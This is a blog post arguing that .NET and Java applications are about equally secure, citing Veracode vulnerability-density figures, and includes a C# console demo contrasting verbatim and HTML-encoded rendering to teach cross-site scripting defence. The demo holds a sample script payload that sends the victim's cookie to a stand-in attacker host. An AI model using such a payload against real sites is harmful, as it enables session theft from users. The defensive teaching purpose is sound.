Interesting question – eh? There is a great amount of passion on both sides of the argument. Beyond the emotion and hype, what’s the reality?
After Microsoft followed Java's lead and adopted a managed, intermediate-language runtime (the Common Language Runtime) for .NET, our official position has been that in the hands of a skilled developer, both platforms can be used to produce equally secure applications.
I had a client ask me this question last week, so I went looking for the latest data to back this up.
Veracode is an application security testing solution provider that scans binaries, byte code and web applications as a service. They keep track of the aggregated data of the applications they scan and have recently begun publishing reports on the overall security of the code their service analyzes. Since they support both .NET and Java byte code scanning, I went to them for some specific data.
This wasn’t published in their report (they are looking at adding this in the next revision), but this is what their data shows: the vulnerability density (average flaws per MB of code scanned) for .NET was 27.2 and for Java the overall density was 30.0.
To me, these numbers are close enough, and likely within the sampling error of their data, that the security of .NET and Java code should be considered equivalent. What is interesting is that the prevalence of the types of vulnerabilities found in .NET code differs from the types found in Java code. This table comes from the published report:
This is useful data when designing training for .NET and Java developers. For both groups, an emphasis should be placed on avoiding cross-site scripting flaws. Veracode attributes the higher frequency of cross-site scripting vulnerabilities in .NET applications to the use of older .NET controls that write their output verbatim rather than HTML-encoding it. If you are using .NET, make sure you are using the newer controls and syntax that encode output by default, and encode explicitly wherever they do not.
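To make the "older controls don't encode" point concrete, here is an added example (it is not code from the original post or from Veracode) that reduces the two rendering behaviours to plain C# so it runs as a console program. In Web Forms, `Label.Text` and the `<%= %>` syntax write the string verbatim, while `Literal` with `Mode="Encode"` and the `<%: %>` syntax (ASP.NET 4.0 and later) HTML-encode it; in MVC, Razor's `@` encodes and `@Html.Raw` does not. The attacker payload and the `evil.example` host are constructed for the demonstration; `System.Net.WebUtility.HtmlEncode` is a real .NET API that performs the same HTML-body encoding as `HttpUtility.HtmlEncode`.

```csharp
// Added example, not part of the original post: the difference between a
// control that writes user input verbatim and one that HTML-encodes it first.
// Runs as a console program on .NET Framework 4.x or .NET 6+ (dotnet run).
using System;
using System.Net; // WebUtility.HtmlEncode (same behaviour as HttpUtility.HtmlEncode)

static class OutputEncodingDemo
{
    // Constructed attacker-controlled input, e.g. a query-string parameter
    // reflected into the page. The host name is made up for the example.
    public const string Payload =
        "<script>document.location='http://evil.example/?c='+document.cookie</script>";

    // Old style: the value is concatenated into the markup as-is. This is what
    // Label.Text, <%= %> (Web Forms) and @Html.Raw (MVC) do.
    public static string RenderRaw(string userInput) =>
        "<span id=\"greeting\">Hello, " + userInput + "</span>";

    // Hardened: encode for HTML element content before writing. This is what
    // Literal Mode="Encode", <%: %> and Razor's @ do automatically.
    public static string RenderEncoded(string userInput) =>
        "<span id=\"greeting\">Hello, " + WebUtility.HtmlEncode(userInput) + "</span>";

    // Simple check usable from a unit test: does the rendered markup still
    // contain an unescaped script tag opener?
    public static bool ContainsRawTag(string html) =>
        html.IndexOf("<script", StringComparison.OrdinalIgnoreCase) >= 0;

    static void Main()
    {
        string raw  = RenderRaw(Payload);
        string safe = RenderEncoded(Payload);

        Console.WriteLine("RAW:     " + raw);
        Console.WriteLine("ENCODED: " + safe);

        // The raw rendering carries the injected script through intact;
        // the encoded rendering turns '<' into "&lt;" so the browser shows text.
        if (!ContainsRawTag(raw))
            throw new InvalidOperationException("expected the raw rendering to be injectable");
        if (ContainsRawTag(safe))
            throw new InvalidOperationException("encoded rendering must not contain a live tag");

        Console.WriteLine("Encoding neutralised the payload.");
    }
}
```

One caveat worth keeping in the training material: `HtmlEncode` (and the auto-encoding controls built on it) is correct only for HTML element content. Values placed into a JavaScript string, a URL, an unquoted attribute or a style block need the encoder for that context (for example `HttpUtility.JavaScriptStringEncode` or `Uri.EscapeDataString`), and a value passed to `Html.Raw` or a `Literal` in `PassThrough` mode is never encoded at all, whichever framework version is in use.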
Bottom Line: the perceived difference in security between .NET and Java isn't a reason to select one language and framework over the other.